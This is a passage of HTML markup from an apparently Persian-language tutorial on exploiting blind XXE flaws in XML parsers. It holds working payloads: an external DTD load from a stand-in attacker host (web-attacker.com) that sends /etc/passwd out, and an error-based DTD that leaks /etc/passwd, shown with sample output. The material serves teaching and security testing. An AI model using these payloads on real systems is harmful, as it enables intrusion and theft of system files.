data-id=\"13f46db\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 
elementor-top-column elementor-element elementor-element-d33f45d\" data-id=\"d33f45d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2274be7 elementor-widget elementor-widget-text-editor\" data-id=\"2274be7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u062f\u0631 \u0646\u0647\u0627\u06cc\u062a \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u0632\u06cc\u0631 \u0631\u0627 \u062f\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u062b\u0628\u062a \u06a9\u0646\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f069bf7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f069bf7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e2db677\" data-id=\"e2db677\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2a67047 elementor-widget elementor-widget-text-editor\" data-id=\"2a67047\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!DOCTYPE foo 
[&lt;!ENTITY % xxe SYSTEM &#8220;http:\/\/web-attacker.com\/malicious.dtd&#8221;&gt; %xxe;]&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0691c78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0691c78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-451ad75\" data-id=\"451ad75\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7ee9187 elementor-widget elementor-widget-text-editor\" data-id=\"7ee9187\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\u0627\u06cc\u0646 \u067e\u06cc\u200c\u0644\u0648\u062f XXE \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc XML \u0628\u0647 \u0646\u0627\u0645 xxe \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0633\u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062f\u0627\u062e\u0644 \u062e\u0648\u062f DTD \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f. 
\u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u067e\u0627\u0631\u0633\u0631 XML \u0641\u0627\u06cc\u0644 DTD \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u06cc\u0627 \u062e\u0627\u0631\u062c\u06cc \u0631\u0627 \u0627\u0632 \u0633\u0631\u0648\u0631 \u0645\u0647\u0627\u062c\u0645 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u062f \u0648 \u0622\u0646 \u0631\u0627 \u062a\u0641\u0633\u06cc\u0631 \u06a9\u0646\u062f. \u0633\u067e\u0633 \u0645\u0631\u0627\u062d\u0644\u06cc \u06a9\u0647 \u062f\u0631 \u0641\u0627\u06cc\u0644 DTD \u0645\u062e\u0631\u0628 \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0628\u0648\u062f\u0646\u062f \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0648 \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0628\u0647 \u0633\u0631\u0648\u0631 \u0645\u0647\u0627\u062c\u0645 \u0627\u0646\u062a\u0642\u0627\u0644 \u067e\u06cc\u062f\u0627 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.\n\n<strong>\u0646\u06a9\u062a\u0647:<\/strong> \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0631\u0627\u06cc \u0645\u062d\u062a\u0648\u0627\u0647\u0627\u06cc\u06cc \u062e\u0627\u0635\u06cc \u062f\u0631 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u060c \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 newline \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0641\u0627\u06cc\u0644 \/etc\/passwd\u060c \u06a9\u0627\u0631 \u0646\u06a9\u0646\u062f. 
\u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0631\u062e\u06cc \u067e\u0627\u0631\u0633\u0631\u0647\u0627\u06cc XML\u060c \u0622\u062f\u0631\u0633 URL \u0631\u0627 \u06a9\u0647 \u062f\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 API \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0647 \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 URL \u0622\u0645\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627\u06cc \u0645\u062c\u0627\u0632 \u0628\u0627\u0634\u0646\u062f (\u062f\u0631 URL \u062e\u0637 \u062c\u062f\u06cc\u062f \u0646\u062f\u0627\u0631\u06cc\u0645!). \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0645\u0648\u0627\u0642\u0639\u06cc\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0647 \u062c\u0627\u06cc \u067e\u0631\u0648\u062a\u06a9\u0644 HTTP \u0627\u0632 \u067e\u0631\u0648\u062a\u06a9\u0644 FTP \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f. 
\u0628\u0639\u0636\u06cc \u0627\u0648\u0642\u0627\u062a \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0644\u06cc \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062d\u0627\u0648\u06cc \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631 newline \u0631\u0627 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u062f\u061b \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0627\u0642\u0639 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0641\u0627\u06cc\u0644 \u062f\u06cc\u06af\u0631\u06cc \u0645\u0627\u0646\u0646\u062f \/etc\/hostname \u0631\u0627 \u0647\u062f\u0641 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f.\n<span style=\"font-size: 8pt;\"><strong>*\u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u06cc\u0639\u0646\u06cc \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u0645\u0642\u062f\u0627\u0631 \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0627\u0634\u062f. 
\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0647 \u0627\u0646\u062a\u06cc\u062a\u06cc one \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u0645 \u0648 \u0645\u0642\u062f\u0627\u0631 \u0622\u0646 \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u0627\u0646\u062a\u06cc\u062a\u06cc two \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u0645\u060c \u0647\u0646\u06af\u0627\u0645\u06cc \u06a9\u0647 &amp;one \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u06a9\u0646\u06cc\u0645\u060c \u0627\u0646\u062a\u06cc\u062a\u06cc two \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u067e\u0633 \u0627\u0632 \u0622\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 &amp;two \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u06a9\u0646\u06cc\u0645.<\/strong><\/span>\n<h4 id=\"err-msg\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u062f\u0627\u062f\u0647\u200c\u0647\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc \u062e\u0637\u0627<\/span><\/h4>\n\u06cc\u06a9 \u0631\u0648\u06cc\u06a9\u0631\u062f \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0628\u0631\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE\u060c \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u06cc\u06a9 Parsing Error \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633\u06cc \u0628\u0627\u0634\u062f \u06a9\u0647 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u062f\u0633\u062a\u06cc\u0627\u0628\u06cc \u0628\u0647 \u0622\u0646\u200c\u0647\u0627 \u0647\u0633\u062a\u06cc\u0645. 
\u0627\u06cc\u0646 \u0631\u0648\u06cc\u06a9\u0631\u062f \u0632\u0645\u0627\u0646\u06cc \u0645\u0648\u062b\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0631\u0627 \u0628\u0647 \u0647\u0645\u0631\u0627\u0647 \u067e\u0627\u0633\u062e \u062e\u0648\u062f \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u062f.\n\u0634\u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u062e\u0627\u0631\u062c\u06cc \u0645\u062e\u0631\u0628 \u2013 \u06a9\u0647 \u0631\u0648\u06cc \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0645\u062a\u0639\u0644\u0642 \u0628\u0647 \u0634\u0645\u0627 \u0645\u06cc\u0632\u0628\u0627\u0646\u06cc \u0645\u06cc\u200c\u0634\u0648\u062f \u2013 \u06cc\u06a9 Parsing Error \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0628\u0627\u0634\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ee1adc1 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ee1adc1\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c7d2357\" data-id=\"c7d2357\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2d2bf00 elementor-widget elementor-widget-text-editor\" data-id=\"2d2bf00\" data-element_type=\"widget\" 
data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code class=\"language-unknown\"><\/code><\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!ENTITY % file SYSTEM &#8220;file:\/\/\/etc\/passwd&#8221;&gt; <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">&lt;!ENTITY % eval &#8220;&lt;!ENTITY &amp;#x25; error SYSTEM &#8216;file:\/\/\/nonexistent\/%file;&#8217;&gt;&#8221;&gt; <\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">%eval;<\/span><\/strong><br \/><strong><span style=\"color: #ffffff;\">%error;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b027b4c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b027b4c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a988989\" data-id=\"a988989\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0c75c3d elementor-widget elementor-widget-text-editor\" data-id=\"0c75c3d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 DTD \u0645\u0631\u0627\u062d\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 
\u0645\u06cc\u200c\u062f\u0647\u062f:<\/p><ul><li>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0627\u0633\u0645 file \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0627\u0633\u062a.<\/li><li>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0627\u0633\u0645 eval \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0628\u0647 \u0646\u0627\u0645 error \u0627\u0633\u062a. \u0627\u0646\u062a\u06cc\u062a\u06cc error \u0647\u0646\u06af\u0627\u0645 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc\u060c \u0633\u0639\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u0641\u0627\u06cc\u0644\u06cc \u0631\u0627 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u062f \u06a9\u0647 \u0648\u062c\u0648\u062f \u062e\u0627\u0631\u062c\u06cc \u0646\u062f\u0627\u0631\u062f\u060c \u0648\u0644\u06cc \u0646\u0627\u0645 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u062d\u0627\u0648\u06cc \u0645\u0642\u062f\u0627\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc file (\u06cc\u0639\u0646\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd) \u0627\u0633\u062a. 
(\u0645\u0639\u0646\u0627\u06cc \u062a\u0639\u0631\u06cc\u0641 \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0631\u0627 \u062f\u0631 \u0628\u062e\u0634 \u0642\u0628\u0644 \u06af\u0641\u062a\u06cc\u0645).<\/li><li>\u0627\u0646\u062a\u06cc\u062a\u06cc eval \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0627\u0646\u062a\u06cc\u062a\u06cc error \u0628\u0647 \u0635\u0648\u0631\u062a \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u062a\u0639\u0631\u06cc\u0641 \u0634\u0648\u062f.<\/li><li>\u0627\u0646\u062a\u06cc\u062a\u06cc error \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f\u061b \u0628\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc error\u060c \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0633\u0639\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u0641\u0627\u06cc\u0644\u06cc \u0631\u0627 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u062f \u06a9\u0647 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f. \u0627\u06cc\u0646 \u0645\u0633\u0627\u0644\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0627\u06cc\u062c\u0627\u062f \u0634\u0648\u062f \u06a9\u0647 \u0646\u0627\u0645 \u0641\u0627\u06cc\u0644 \u0646\u0627\u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0622\u0646 \u0622\u0645\u062f\u0647 \u0627\u0633\u062a. 
\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u0627\u0634\u0627\u0631\u0647 \u06a9\u0631\u062f\u06cc\u0645\u060c \u0646\u0627\u0645 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u0646\u0627\u0645\u0648\u062c\u0648\u062f \u0647\u0645 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0628\u0648\u062f.<\/li><\/ul><p>\u0627\u062c\u0631\u0627\u06cc DTD \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0645\u0627\u0646\u0646\u062f \u067e\u06cc\u0627\u0645 \u0632\u06cc\u0631 \u062a\u0648\u0644\u06cc\u062f \u0634\u0648\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c39cf5f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c39cf5f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-086a95f\" data-id=\"086a95f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-be1e9ae elementor-widget elementor-widget-text-editor\" data-id=\"be1e9ae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: 
#ffffff;\"><strong>java.io.FileNotFoundException: \/nonexistent\/root:x:0:0:root:\/root:\/bin\/bash <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-07a8472 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"07a8472\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-419a492\" data-id=\"419a492\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9c0affb elementor-widget elementor-widget-text-editor\" data-id=\"9c0affb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h4 id=\"local-dtd\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u063a\u06cc\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u0632 \u06cc\u06a9 DTD \u0645\u062d\u0644\u06cc<\/span><\/h4>\n\u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc \u0628\u0631\u0627\u06cc DTD \u062e\u0627\u0631\u062c\u06cc \u0628\u0647 \u062e\u0648\u0628\u06cc \u06a9\u0627\u0631 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0648\u0644\u06cc \u0645\u0639\u0645\u0648\u0644\u0627 
\u0628\u0631\u0627\u06cc \u06cc\u06a9 DTD \u062f\u0627\u062e\u0644\u06cc \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062f\u0631 \u062a\u06af DOCTYPE \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u062c\u0648\u0627\u0628 \u0646\u0645\u06cc\u200c\u062f\u0647\u0646\u062f. \u062f\u0644\u06cc\u0644 \u0622\u0646 \u0647\u0645 \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u060c \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f (\u0645\u062b\u0644\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 %file \u062f\u0631 \u0627\u0646\u062a\u0647\u0627\u06cc URL \u06cc\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 %file \u062f\u0631 \u0627\u0646\u062a\u0647\u0627\u06cc \u0622\u062f\u0631\u0633 \u062a\u0639\u06cc\u06cc\u0646\u200c\u0634\u062f\u0647 \u062f\u0631 \u067e\u0631\u0648\u062a\u06a9\u0644 file:\/\/). 
\u062f\u0631 \u0632\u0628\u0627\u0646 XML\u060c \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u062f\u0631 DTD\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0645\u062c\u0627\u0632 \u0627\u0633\u062a \u0648\u0644\u06cc \u062f\u0631 DTD\u0647\u0627\u06cc \u062f\u0627\u062e\u0644\u06cc \u0645\u062c\u0627\u0632 \u0646\u06cc\u0633\u062a (\u0627\u0644\u0628\u062a\u0647 \u0628\u0639\u0636\u06cc \u067e\u0627\u0631\u0633\u0631\u0647\u0627 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0627 \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u0634\u06a9\u0644\u06cc \u0646\u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f\u060c \u0648\u0644\u06cc \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u067e\u0627\u0631\u0633\u0631\u0647\u0627 \u0622\u0646 \u0631\u0627 \u0642\u0628\u0648\u0644 \u0646\u0645\u06cc\u200c\u06a9\u0646\u0646\u062f).\n\n\u062d\u0627\u0644\u0627 \u0627\u06af\u0631 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a out-of-band \u0628\u0644\u0627\u06a9 \u0634\u062f\u0647 \u0628\u0648\u062f \u0686\u0647 \u06a9\u0646\u06cc\u0645\u061f \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0645\u0648\u0627\u0642\u0639\u06cc \u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u0627\u062f\u0647 \u0631\u0627 \u0627\u0632 \u0627\u062a\u0635\u0627\u0644 out-of-band \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u062f\u060c \u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06cc\u06a9 DTD \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0631\u0627 \u0627\u0632 \u0631\u0648\u06cc \u06cc\u06a9 \u0633\u0631\u0648\u0631 \u062e\u0627\u0631\u062c\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f. 
